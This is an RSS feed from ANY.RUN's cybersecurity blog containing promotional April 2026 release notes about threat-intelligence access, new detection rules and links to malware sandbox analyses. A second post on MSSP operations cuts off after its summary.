<?xml version="1.0" encoding="UTF-8" standalone="no"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" version="2.0">

<channel>
	<title>ANY.RUN RSS feed</title>
	<atom:link href="https://any.run/cybersecurity-blog/feed/" rel="self" type="application/rss+xml"/>
	<link/>
	<description>The latest posts and cybersecurity news</description>
	<lastBuildDate>Thu, 30 Apr 2026 12:46:03 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.6.2</generator>

<image>
	<url>https://any.run/cybersecurity-blog/wp-content/uploads/2025/10/android-chrome-512x512-1-70x70.png</url>
	<title>ANY.RUN's Cybersecurity Blog</title>
	<link/>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More</title>
		<link>https://any.run/cybersecurity-blog/release-notes-april-2026/</link>
					<comments>https://any.run/cybersecurity-blog/release-notes-april-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 30 Apr 2026 11:57:42 +0000</pubDate>
				<category><![CDATA[Service Updates]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[update]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20643</guid>

					<description><![CDATA[<p>April brought several updates across ANY.RUN’s Threat Intelligence and detection coverage.&#160; The biggest change is expanded access to Threat Intelligence: Free plan users now get&#160;20 premium requests in TI Lookup and YARA Search. This gives security teams a practical way to check suspicious indicators, explore related sandbox sessions, and&#160;validate&#160;malware or phishing activity using real attack [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/release-notes-april-2026/">Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>April brought several updates across ANY.RUN’s Threat Intelligence and detection coverage.&nbsp;</p>



<p>The biggest change is expanded access to Threat Intelligence: Free plan users now get&nbsp;<strong>20 premium requests in TI Lookup and YARA Search</strong>. This gives security teams a practical way to check suspicious indicators, explore related sandbox sessions, and&nbsp;validate&nbsp;malware or phishing activity using real attack data.&nbsp;</p>



<p>On the detection side, our team added&nbsp;<strong>78 new&nbsp;behavior&nbsp;signatures</strong>,&nbsp;<strong>1,657 new Suricata rules</strong>, and&nbsp;<strong>35 new YARA rules</strong>. We also released new Threat Intelligence Reports covering malware, loaders, RATs, backdoors, and supply-chain threats&nbsp;observed&nbsp;in recent submissions.&nbsp;</p>



<p>Here’s&nbsp;a closer look at&nbsp;what’s&nbsp;new.&nbsp;</p>



<h2 class="wp-block-heading">Product Updates&nbsp;</h2>



<p>In April, ANY.RUN expanded access to&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>&nbsp;capabilities, giving more teams a way to test threat context directly in their SOC workflows.&nbsp;</p>



<p>The key update:&nbsp;<a href="https://any.run/plans-ti/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotipricing" target="_blank" rel="noreferrer noopener"><strong>Free plan users</strong></a><strong>&nbsp;now get 20 premium requests in TI Lookup and&nbsp;</strong><a href="https://intelligence.any.run/analysis/yara?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktolookup" target="_blank" rel="noreferrer noopener"><strong>YARA Search</strong></a><strong>.</strong>&nbsp;This gives security teams a practical way to check indicators, explore related sandbox sessions, and&nbsp;validate&nbsp;suspicious activity using real attack data from ANY.RUN’s community.&nbsp;</p>



<h3 class="wp-block-heading"><em>More Threat Context with 20 Premium TI Requests</em>&nbsp;</h3>



<p>Threat intelligence brings the most value when it helps teams make faster decisions during active investigations. Instead of stopping at one suspicious IP, domain, hash, or&nbsp;behavior, analysts can pivot to connected samples, infrastructure, artifacts, and attack context.&nbsp;</p>



<p>With 20 premium requests now included in the Free plan, SOC and MSSP teams can explore threat data across IOCs, IOBs, and IOAs linked to recent malware and phishing activity.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img fetchpriority="high" decoding="async" width="1024" height="540" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-1024x540.webp" alt="" class="wp-image-20644" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-1024x540.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-300x158.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-768x405.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-370x195.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-270x142.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png-740x390.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/bigti_0.png.webp 1522w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI&nbsp;Lookup request with AI assistant that helps the user&nbsp;select sandbox analyses of malware using a TTP</em></figcaption></figure></div>


<p>Teams can use this expanded access across key SOC workflows:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Alert triage:</strong>&nbsp;Check suspicious indicators against&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">real sandbox data</a>&nbsp;and get more context before closing or escalating an alert.&nbsp;</li>



<li><strong>Incident response:</strong>&nbsp;Pivot from one indicator to related artifacts, infrastructure, and&nbsp;behavior&nbsp;to understand the wider attack chain.&nbsp;</li>



<li><strong>Threat hunting:</strong>&nbsp;Use TI Lookup and YARA Search to test hypotheses against real-world malware data.</li>



<li><strong>Detection work:</strong>&nbsp;Find patterns and artifacts that can support new or improved detection logic.&nbsp;</li>
</ul>



<p>ANY.RUN also introduced&nbsp;<strong>AI-assisted search in TI Lookup</strong>, allowing users to describe what they need in natural language while the system helps translate the request into a structured query.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Give your team the context for faster triage and response. <br>
<span class="highlight">Test ANY.RUN Threat Intelligence in real SOC workflows. <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/plans-ti/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=release-notes-april-2026&#038;utm_term=300426&#038;utm_content=linktotipricing#contact-sales" rel="noopener" target="_blank">
Contact us
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p>With threat intelligence available directly in the workflow, SOC and MSSP teams can move faster from suspicious signal to confident action:&nbsp;</p>



<ul class="wp-block-list">
<li><strong>Faster alert validation:</strong>&nbsp;Teams can check suspicious indicators against real attack data and make decisions sooner.&nbsp;</li>



<li><strong>Lower escalation noise:</strong>&nbsp;More context helps reduce escalations driven by uncertainty.&nbsp;</li>



<li><strong>Shorter investigations:</strong>&nbsp;Analysts can move from one indicator to related samples, infrastructure, and&nbsp;behavior&nbsp;faster.&nbsp;</li>



<li><strong>Stronger threat hunting:</strong>&nbsp;Teams can test hypotheses against current malware and phishing data.&nbsp;</li>



<li><strong>Better detection quality:</strong>&nbsp;Real-world artifacts and&nbsp;behavior&nbsp;patterns can support more relevant detection logic.&nbsp;</li>



<li><strong>More measurable security value:</strong>&nbsp;Faster triage, better prioritization, and clearer evidence help teams focus capacity on confirmed risk.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">Threat Coverage Updates&nbsp;</h2>



<p>In April, our detection team continued to strengthen ANY.RUN’s threat coverage with new&nbsp;behavior&nbsp;signatures, Suricata rules, and YARA rules.&nbsp;</p>



<p>This month’s updates include:&nbsp;</p>



<ul class="wp-block-list">
<li>78 new&nbsp;behavior&nbsp;signatures&nbsp;</li>



<li>1,657 new Suricata rules&nbsp;</li>



<li>35 new YARA rules&nbsp;</li>
</ul>



<p>These additions help expand detection coverage across suspicious&nbsp;behavior, network activity, and file-based indicators.&nbsp;</p>



<h3 class="wp-block-heading">New&nbsp;Behavior&nbsp;Signatures&nbsp;&nbsp;</h3>



<p>In April, we added&nbsp;<strong>78 new&nbsp;behavior&nbsp;signatures</strong>&nbsp;covering malware-specific activity, mutex-based indicators, suspicious persistence&nbsp;behavior, and exploitation-related activity.&nbsp;</p>



<p>The new signatures focus on observable actions and artifacts that appear during detonation, helping teams move beyond file reputation and confirm what a sample&nbsp;actually does&nbsp;in the sandbox.&nbsp;</p>



<p>Highlighted detections include:&nbsp;</p>



<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-1 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1b4372dc-2726-4cd7-9ba6-eb4d7dc69bb5?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Sextor mutex</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0adad70f-7bd8-4643-be28-406d36423e61?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">BlindEagle</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/04d13abc-5717-4f2b-96aa-6b96604237c2?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SantaStealer</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0667857e-51c3-4f16-ae85-5cc55e2b0dba?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Raton</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/049e5062-8191-4cc9-b72a-64c8a7f94be3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">SpankRAT</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/487516cc-f2af-411d-a5d1-46216fe09d29?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">CVE-2026-34621</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1b4bd54b-ab2f-4dc2-bc6f-11a9d6aaf777?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">GetWell mutex</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/2581d703-26ba-45ae-a7f6-73d691eb38f3?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">NinjaRMM mutex</a>&nbsp;</li>
</ul>
</div></div>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" width="1024" height="567" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-1024x567.png" alt="Killada detected inside ANY.RUN sandbox" class="wp-image-20645" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-1024x567.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-300x166.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-768x425.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-1536x850.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-2048x1133.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-370x205.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-270x149.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-15.25.35-740x409.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Killada detected inside ANY.RUN sandbox</em></figcaption></figure></div>


<div class="wp-block-group"><div class="wp-block-group__inner-container is-layout-grid wp-container-core-group-is-layout-2 wp-block-group-is-layout-grid">
<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0d473778-5756-4bed-bf96-b322a1c310f7?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">CrystalX</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1eb1531f-5369-496b-93f9-b0cc1a26f7af?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">VexxStealer</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/28125a7b-3f33-4886-8b1b-0752911e7208?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Suspicious macOS persistence plist</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/4a3e6d18-b221-4571-ba56-e13c3b9392ac?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">BankBot</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/3b24a245-82c7-4e32-b43c-4686a34b447e?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Killada</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/3b24a245-82c7-4e32-b43c-4686a34b447e?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Killada mutex</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/6e202e37-3804-4c41-99e6-85cbe591fe60?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Oblivion</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/0629bf3a-f16a-445a-8f2c-3a903b5929a5?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">HangHost</a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/9d8c6c97-fd37-4cd8-b1eb-a2cd12333830?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Raxid mutex</a>&nbsp;</li>
</ul>
</div></div>



<h3 class="wp-block-heading">New Suricata Rules&nbsp;</h3>



<p>In April, we also added&nbsp;<strong>1,657 new Suricata rules</strong>&nbsp;to improve visibility into malicious network activity, including payload retrieval, DLL downloads, and possible command-and-control checks.&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/fb1972a5-4157-4030-80a3-ab066e20196f/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">DonutLoader base64-exe payload retrieval via HTTP</a>&nbsp;(sid: 85007037): Detects malware&#8217;s attempts to get executable payload from stager server via HTTP&nbsp;</li>



<li><a href="https://app.any.run/tasks/6594a017-1448-4e10-a62c-e9f4000f53b8/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Winos/ValleyRAT DLL download via TCP</a>&nbsp;(sid: 85007024):&nbsp;Identifies&nbsp;ValleyRAT&nbsp;related DLL-file downloads via non-standard port TCP connection&nbsp;</li>



<li><a href="https://app.any.run/tasks/c9f48db1-4513-4ccb-b52c-35ab53cf7be2/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Possible AsyncRAT-style TCP C2 connectivity check</a>&nbsp;(sid: 85007061): Heuristic rule tracking&nbsp;AsyncRAT-like malware implementations, based on set of connections to specific ports on the same host,&nbsp;likely checkingconnectivity with C2.&nbsp;</li>
</ul>



<p>With these additions, sandbox sessions can surface more network-level indicators tied to malware delivery and post-infection communication.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut response delays</span> before threats become costly incidents. <br>
Give your SOC <span class="highlight">faster, evidence-backed decisions. <br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=release-notes-april-2026&#038;utm_term=300426&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate in your SOC
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">New YARA Rules&nbsp;</h3>



<p>In April, ANY.RUN added&nbsp;<strong>35 new YARA rules</strong>&nbsp;to expand static detection coverage for suspicious files and known threat artifacts.&nbsp;</p>



<p>This layer is especially useful when a sample&nbsp;contains&nbsp;recognizable strings, code patterns, or structural markers that can link it to a known detection before or alongside&nbsp;behavior-based analysis.&nbsp;</p>



<p>Highlighted YARA detections include:&nbsp;</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1b337e18-5e92-43b0-a8d7-b6e8d25e8ee5?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Sentinel</a> </li>



<li><a href="https://app.any.run/tasks/0500e3a7-97dc-4a3e-9767-0b9f6b0ab766?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Datto</a> </li>



<li><a href="https://app.any.run/tasks/3a07a112-0393-4eb6-aa92-a1c972d17238?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Spank</a> </li>



<li><a href="https://app.any.run/tasks/7df99e42-df44-441e-9e40-aff2e2684c22?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">DefendNot</a></li>



<li><a href="https://app.any.run/tasks/0667857e-51c3-4f16-ae85-5cc55e2b0dba?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">Raton</a> </li>
</ul>



<p>Together, the new&nbsp;behavior&nbsp;signatures, Suricata rules, and YARA rules give security teams broader coverage across runtime&nbsp;behavior, network traffic, and file-level indicators.&nbsp;</p>



<h3 class="wp-block-heading">Threat Intelligence Reports&nbsp;</h3>



<p>In April, our team released new&nbsp;<a href="https://any.run/cybersecurity-blog/threat-intelligence-reports/" target="_blank" rel="noreferrer noopener">Threat Intelligence Reports</a>&nbsp;covering recent malware activity, attacker tooling, and techniques&nbsp;observed&nbsp;across real-world submissions.&nbsp;</p>



<p>Available as part of ANY.RUN’s&nbsp;<a href="https://intelligence.any.run/plans?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotiplans" target="_blank" rel="noreferrer noopener">TI Lookup Premium</a>&nbsp;plan, these reports give security teams a clearer view of how specific threats behave, what artifacts they leave behind, and which indicators can support faster investigation.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" width="1024" height="532" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-1024x532.png" alt="Threat Intelligence reports in ANY.RUN " class="wp-image-20646" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-1024x532.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-300x156.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-768x399.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-1536x799.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-2048x1065.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-370x192.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-270x140.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/Screenshot-2026-04-29-at-16.29.37-740x385.png 740w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Threat Intelligence reports in ANY.RUN with updated search parameters for faster threat investigation</em></figcaption></figure></div>


<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/reports/2026-04-15-threat-brief-mimic-crystalx-telnyx" target="_blank" rel="noreferrer noopener">MIMIC, CrystalX, and Trojanized Telnyx Package</a>:&nbsp;This report covers MIMIC ransomware,&nbsp;CrystalX&nbsp;RAT, and a&nbsp;trojanized&nbsp;Telnyx&nbsp;Python SDK, focusing on encryption&nbsp;behavior, remote access and persistence, and malicious code execution through unauthorized&nbsp;PyPI&nbsp;releases.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/reports/2026-04-09-threat-brief-etherrat-ocrfix-silentconnect" target="_blank" rel="noreferrer noopener">ETHERRAT, OCRFix, and SILENTCONNECT</a>:&nbsp;This brief examines a Node.js backdoor, a loader/botnet&nbsp;component, and a Windows loader, focusing on blockchain-based C2/configuration retrieval, scheduled-task persistence, in-memory PowerShell execution, and&nbsp;ScreenConnect&nbsp;deployment.&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://intelligence.any.run/reports/2026-04-01-threat-brief-crysome-infiniti-brushworm" target="_blank" rel="noreferrer noopener">CRYSOME, INFINITY, and BRUSHWORM</a>:&nbsp;This report examines a Windows RAT, a macOS stealer, and a Windows backdoor, focusing on TCP-based remote control,&nbsp;ClickFix-like delivery, credential theft, scheduled-task persistence, modular DLL download, and file theft.&nbsp;</li>
</ul>



<h2 class="wp-block-heading">About ANY.RUN&nbsp;</h2>



<p>ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and make confident decisions with real-world attack data.&nbsp;</p>



<p>Its solutions, including&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;and&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a>,&nbsp;give SOC and MSSP teams the context they need to&nbsp;analyze&nbsp;malware, phishing, infrastructure,&nbsp;behaviors, and indicators in one workflow.&nbsp;</p>



<p>Trusted by more than&nbsp;<strong>15,000 organizations</strong>&nbsp;and&nbsp;<strong>600,000 security professionals worldwide</strong>, including&nbsp;<strong>74% of Fortune 100 companies</strong>, ANY.RUN helps teams improve triage speed, strengthen detection coverage, reduce investigation time, and respond to emerging threats with clearer evidence.&nbsp;</p>



<p><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-april-2026&amp;utm_term=300426&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener"><strong>Integrate ANY.RUN into your SOC workflow →</strong></a>&nbsp;</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/release-notes-april-2026/">Release Notes: Expanded Threat Intelligence Access, AI Assisted Search 1,770 New Detections and More</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/release-notes-april-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Margin vs. Madness: Fixing MSSP Top 5 Operational Nightmares</title>
		<link>https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/</link>
					<comments>https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 29 Apr 2026 07:29:04 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Interactive Sandbox]]></category>
		<category><![CDATA[MSSP]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20580</guid>

					<description><![CDATA[<p>Leading a managed security services provider has never been a comfortable job.&#160;And it&#160;isn’t&#160;now, though the&#160;demand for MSSPs has never been higher. The global threat landscape is expanding faster than most enterprise security teams can keep pace with, and organizations across every sector are turning to managed providers to fill the gap.&#160;&#160; For MSSP leaders, this [&#8230;]</p>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/">Margin vs. Madness: Fixing MSSP Top 5 Operational Nightmares</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
